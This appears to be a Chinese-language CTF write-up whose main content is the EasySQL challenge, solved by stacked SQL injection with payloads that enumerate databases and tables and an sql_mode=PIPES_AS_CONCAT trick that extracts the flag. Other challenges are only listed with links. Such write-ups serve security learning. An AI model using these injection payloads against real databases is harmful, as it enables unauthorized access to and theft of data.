CheckIn
另一篇博客
EasySQL 考点:堆叠注入fuzz一下
过滤了insert,or,order,delete,update,like,union等一些字符,但;没有被过滤,我们可以考虑堆叠注入。
query=1;show databases; query=1;use ctf;show tables;
由于在最开始测试时发现输入任意数字回显都是Array([0]= > 1),输入字母无回显,猜测查询语句
$sql = "select ".$post['query']."||flag from Flag";
||在SQL语句中表示或,在查询表中的字段内容时,逗号用于查询多个字段名
非预期:
*,1 //select *,1 from Flag
预期解:
通过修改SQL配置将或运算符||设置为连接符
1;set sql_mode=PIPES_AS_CONCAT;select 1 //select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag;Pythonginx
另一篇博客
easyWeb另一篇博客
参考:
https://blog.csdn.net/rfrder/article/details/109743728
